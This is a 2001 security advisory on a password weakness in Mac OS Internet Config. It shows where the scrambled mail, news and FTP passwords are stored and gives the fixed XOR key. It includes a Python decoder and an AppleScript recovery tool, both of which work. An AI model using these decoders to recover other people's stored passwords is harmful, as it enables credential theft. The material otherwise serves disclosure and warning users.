SecureMac, Inc.

StaticUsers.net – Internet Config Advisory

June 2, 2001

Password weakness in Internet Config in MacOS

What is Internet Config?

From Internet Config FAQ: “The Internet Configuration System was designed to make your life easier by reducing the number of times which you need to enter your Internet preferences into the various preferences dialogs of all your Internet applications.

For example, currently you need to enter your Email address into many common
Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie.
The goal of the system was to get each of these applications to get this information
from one common place and to give you a tool to edit these common preferences.”

For example: when you install Power Mail 2.3.1, you can find Internet Config 2.0 in the Power Mail folder. You can use it to set your Internet configuration and then click the “Use Internet Config” option when you set up your e-mail account. Among other things, Internet Config lets you set an Email Password, a News Password and an FTP Proxy Password. All of these passwords are encoded the same way.

Where can you find a password?

In the Internet Preferences file in the Preferences folder. Open this file with a resource editor (ResEdit, for instance) and open the ICRP resource. There you can find the encrypted passwords: MailPassword, NewsAuthPassword and FTPProxyPassword. You can also find them with any hex editor, but the offset depends on the configuration.

Some examples

09 38 3E 3F 31 2E 29 3D 34 30 = nightrain

08 14 3B 39 3A 31 1F 33 3A = BlackDog

09 3B 38 37 37 36 32 3B 35 2A = moonlight

06 19 02 0C 15 1B 0C = OUTLAW

05 37 27 28 35 3F = apple

The first byte is the length of the password, so we don’t need it.

AA BB CC DD EE FF GG HH II JJ = aa bb cc dd ee ff gg hh ii jj

where:

AA BB CC DD EE FF GG HH II JJ – encrypted password (hex)

aa bb cc dd ee ff gg hh ii jj – decrypted password in ASCII codes (hex)

aa=AA XOR 56H

bb=BB XOR 57H

cc=CC XOR 58H

dd=DD XOR 59H

ee=EE XOR 5AH

ff=FF XOR 5BH

gg=GG XOR 5CH

hh=HH XOR 5DH

ii=II XOR 5EH

jj=JJ XOR 5FH

and so on…

An example:

38H XOR 56H = 6EH = n

3EH XOR 57H = 69H = i

3FH XOR 58H = 67H = g

31H XOR 59H = 68H = h

2EH XOR 5AH = 74H = t

29H XOR 5BH = 72H = r

3DH XOR 5CH = 61H = a

34H XOR 5DH = 69H = i

30H XOR 5EH = 6EH = n
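
The scheme above, length byte included, as an added Python example (not part of the original advisory and not adix's script). It checks the length byte against the record and shows that the same fixed key both scrambles and unscrambles. Assumptions: the key counter keeps incrementing past 5FH and wraps after FFH, the text is Mac OS Roman, and the function names are this example's own.

```python
# Added example: Internet Config password scrambling as described in the advisory.
KEY_START = 0x56  # key byte for the first password character (from the advisory)


def keystream(n):
    """Key bytes 56H, 57H, 58H, ... one per character position.

    Assumption: the counter keeps incrementing past 5FH and wraps after FFH.
    """
    return bytes((KEY_START + i) & 0xFF for i in range(n))


def unscramble(record_hex):
    """Decode a record given as hex text: one length byte, then the scrambled bytes."""
    raw = bytes.fromhex(record_hex)  # whitespace between bytes is ignored
    if not raw:
        raise ValueError("empty record")
    length, body = raw[0], raw[1:]
    if length != len(body):
        raise ValueError(f"length byte is {length} but {len(body)} bytes follow")
    plain = bytes(c ^ k for c, k in zip(body, keystream(length)))
    return plain.decode("mac_roman")  # assumption: Mac OS Roman text


def scramble(password):
    """Inverse of unscramble(): XOR is its own inverse and the key is fixed."""
    data = password.encode("mac_roman")
    if len(data) > 255:
        raise ValueError("password does not fit a one-byte length prefix")
    body = bytes(p ^ k for p, k in zip(data, keystream(len(data))))
    return " ".join(f"{b:02X}" for b in bytes([len(data)]) + body)


# The five records listed in the advisory, with the plaintext it gives for each.
ADVISORY_RECORDS = {
    "09 38 3E 3F 31 2E 29 3D 34 30": "nightrain",
    "08 14 3B 39 3A 31 1F 33 3A": "BlackDog",
    "09 3B 38 37 37 36 32 3B 35 2A": "moonlight",
    "06 19 02 0C 15 1B 0C": "OUTLAW",
    "05 37 27 28 35 3F": "apple",
}

if __name__ == "__main__":
    for record, expected in ADVISORY_RECORDS.items():
        print(record, "->", unscramble(record), "(advisory: " + expected + ")")
```

Because the key depends only on the character position, identical passwords always produce identical stored bytes, and anyone who can read the preferences file can reverse them.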

Solution

Don’t use it, or at least don’t enter any password in it. I wonder why Netscape supports it, for example.

tested on:

Internet Config v.1.3, v.1.4, v.2.0 and v.2.0.2

Netscape Messenger 4.5, PowerMail 2.3.1, E(asy)-mail 2.0,

From the Internet Config FAQ:

“The following programs supported Internet Config before 8 Nov 1995.  NewsWatcher 2.0b21 and higher, Register 1.1 and higher, NotifyMail 2.5 and higher, BlitzMail 2.0.2 and higher, MacGzip 0.2.2 and higher, FTPd 2.4.0 and higher, ICeTEe 1.1 and higher, Internet Config Access, Mpack 1.5 and higher, BBEdit 3.1.1 and higher, NewsHopper 1.1 and higher, Anarchie 1.5.0 and higher, NCSA Telnet 2.6.1d7 and higher, Black Night 0.1.4 and higher, DropURL 1.1 and higher, CyberFinder, Symantec Project Manager 8.0.3 and higher, Personal Log 2.0 and higher, most programs based on the WASTE text editing engine, Claris Emailer, Fetch 3.0b5 and higher, PowerMail, ICScriptor, Kapito, Style 1.3.2 and higher, Internet Toolkit, NetSnagger.”

A simple AppleScript to demonstrate the password weakness.

Usage: Don’t enter the first number (the length byte) and don’t put spaces between the bytes.

For example: 383E3F312E293D3430, but not 09383E3F312E293D3430 or 38 3E 3F 31 2E 29 3D 34 30.

(* IC Pass 2.1 by adix 21.07.99; Apple Script English *)

-- Ask for the scrambled password as hex digits (no length byte, no spaces)
set hex1 to text returned of (display dialog "Enter encrypted password:" default answer "" buttons {" Ok "} default button " Ok ")

-- Key bytes 56H to 5FH written as bits; this covers passwords of up to 10 characters
set Alicia to "01010110010101110101100001011001010110100101101101011100010111010101111001011111"
set pass to ""
set i to 1 -- index of the current hex digit pair in hex1
set skok to 0 -- bit offset of the current key byte in Alicia
set ile to count items in hex1
if ile = 1 or ile = 0 then
    set pass to ""
else
    repeat until (i > (ile - 1))
        set kodascii to 0
        set zn to items (i) thru (i + 1) in hex1
        set lbin to hex2bin(zn) as string
        -- XOR the data byte with the key byte, one bit at a time
        repeat with a from 1 to 8
            set bit2 to item (a + skok) of Alicia
            set bit1 to item a of lbin
            if (bit1 = bit2) then
                set bitk to "0"
            else
                set bitk to "1"
            end if
            set kodascii to kodascii + bitk * (2 ^ (8 - a))
        end repeat
        set pass to pass & (ASCII character (kodascii as integer))
        set skok to skok + 8
        set i to i + 2
    end repeat
end if
display dialog "Password:   " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok "

-- Convert a list of hex digits to a string of bits, four bits per digit
on hex2bin(zn)
    set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"}
    set t2hex to "0123456789ABCDEF"
    set bin to "" as string
    repeat with j in zn
        set t1 to j as string
        -- Look up the digit's position in t2hex and take the matching bit pattern
        repeat with i from 1 to (count items in t2hex)
            if ((item i in t2hex) = t1) then
                set temp to (item i in temphex)
                exit repeat
            end if
        end repeat
        set bin to (bin & temp) as string
    end repeat
    return (bin)
end hex2bin

Solutions

From the Internet Config FAQ:

IC does provide the ability for applications to share preferences. Any information you enter into Internet Config can be accessed by any other software you execute on your machine.

This includes preferences like the email password. You should be aware that such passwords are available to any software on your computer. IC stores passwords in a non-secure fashion.

While each password is scrambled to prevent idle viewing with ResEdit, the scrambling algorithm is publicly documented in the IC Programming Kit. Anyone with a trivial programming background can access these passwords.

Note: This situation is no different from the passwords you enter into other applications. When you ask a program (such Users & Groups) to store a password, it must be stored in some file somewhere on your hard disk.  The only difference is that IC provides a public API for getting at these passwords. The important thing to keep in mind is that you should not install software that you do not trust on your machine.

Note: If you ignore this advice (and install software you do not trust on to your computer), password secrecy is the least of your problems. Specifically, the Mac OS does not prevent a program from erasing the entire contents of your hard disk.

If you want to know which applications are accessing which IC preferences, you can install:

ICAccess Logger (ftp://ftp.stairways.com/stairways/hacks/).
